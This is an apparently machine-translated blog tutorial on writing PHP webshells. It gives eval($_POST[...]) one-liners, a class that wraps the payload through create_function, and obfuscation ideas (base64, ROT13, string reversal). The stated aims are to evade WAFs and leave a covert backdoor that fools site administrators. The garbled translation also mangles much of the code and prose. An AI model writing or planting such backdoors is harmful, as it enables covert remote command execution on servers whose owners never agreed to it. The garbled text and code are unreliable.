The study of Webshell in PHP direction (Essence article)

Article theme: Prepare to learn C language, all the dry goods you like in the end of the article in the annex to the author's purpose: No do not want to be a general's soldiers, do not want to improve the technology of person, today with you open the study of Php Road.

this article Laimooc( formerly xoanhn), personal site:www.laimooc.cn .

Previous posts:

General-Purpose Save site user password to CSS file
PHP Write log file left back door (no kill)
substr function to help you avoid the PHP script (lewd idea)

Originally intended to write a comprehensive php script file (Modify the contents of the file, copy files, delete files, create files, directory traversal, etc., execute system commands, file upload, file contents of the encryption or decoding, add or delete to change the database, hijack landing form, and other operations). found that it takes a lot of time to debug, and the partition of these modules are already some of the network, so, so far.

This publication is mainly about: The encapsulation of classes, the use of constructors and Perl-class constants, encoding and decoding, to be combined with the conventional, to make Webshell .

The most basic Webshell is:

, or the shortest one.

"Eval ($_post[1]);"

then I study the original intention:1, is because the shortest sentence, will be a lot of WAF and other direct interception 2, I want to leave a more covert and easy to fool the back door of the Administrator 3, I want to exercise their own PHP mastery and use of 4, in order to give our development team to supervise the safety of programming ideas.

The most basic class:

Class classname

{

}

Go into a little bit so that's the following:

Class classname

{

Function operation () {}

}

Instantiation:

$a = new ClassName ();

$a-operation ();

Well, yes that's the case, very common class.

Look at Perl-class:

Class math{

const PI = 3.14159;

}

echo Math::p I. "\n";

This is the case: the operator accesses the Perl-clas constant. Let's debug Perl-class and try it:

Magic, I also feel that PHP really makes me happy ilove her! So we now use Perlclass, to do a Webshell try:

<?php

error_reporting (0);

Perl-class thought

Class math{

const PI = 3.14159;

}

Echo &quot; Math::p i=&quot;. Math::p I. &quot;\n&quot;;

Const PI This is our Perl-class constant, declared in class, and then the outside of the class: operator to make a constant reference. So we first modify the pi for Base64_decode, you feel will realize, will not because it is a string and then error, do not fear, walk up to see it, we have the Almighty Echo:

Use try, in fact, learn it, is not binding, my guide to give a lot of encouragement, is my role model:

When I used this code, I thought I could use URL encoding, ROT13 encoding, inversion, string concatenation, split-use of strings (such as: explode), search and replace of strings (e.g. substr), quoted-printable string conversion exploits, etc. For more information please refer to: Http://php.net/ref.strings as below, own a sentence in this piece of debugging:

Below we explain, class of encapsulation to make a sentence: first to a finished product, click me, Show source code:

Sorry, again click, also can not show the source code. We talked about the prototype of the class before, so let's try this:

Class a{

function Create_fun ($data)

{

$post = create_function (& #39;& #39;, $data);

$post ();

}

}

In our outer class, the dynamic creation function is called internally to pave the Webshell for the next step, and then we instantiate it: $a = new A ();

This is an instantiation, Jane answer, to remember the new to instantiate, then we refer to the following, we define a create_fun in the inside of the class, we use it here, as below,

$a-&gt;create_fun ($shell);

So here, is not a thing, see out the guys, parameters, the following we are simple definition of parameters Bai: straight sentence, haha, simple violence.

$shell =&quot;eval ($_post[c]);&quot;;

So now the finishing is complete, class of encapsulation to achieve a sentence, test to see:

It is possible to execute the command. That's it.

It is also possible to see our phpinfo ().

Finally, to say, how to combine the construction function to generate a sentence, in fact, if good debugging, our research should be over here.

But in order to say a few more words, I still stay, first to demonstrate how to reverse the string, this makes me feel PHP magic Horse:

function REVERSE_CHR ($STR) {

for ($i =1; $i <=strlen ($STR); $i + +) {

$STRR = substr ($str,-$i, 1);

Echo $STRR;

}

Return

}

This is enough code to achieve, hahaha, in fact, you can also see a short word of a few things: Strrev, this function you do not look small, its power is very strong, self-association.

This reversal function, how to use, a word: Slowly, more use, the big boys taught experience. It is better to give fish than to give it. You have grown up, you have succeeded, we can have a bowl of soup to drink.

OK, don't pull, cervical vertebra pain, everybody usually should pay attention to exercise body.

Below this picture, I am sure, make you feel pleasantly surprised and excited!

This concludes the last study of PHP in Webshell. Ready to learn C language. Attachment packaging address back to read the original download >>> poke me.

The study of Webshell in PHP direction (Essence article)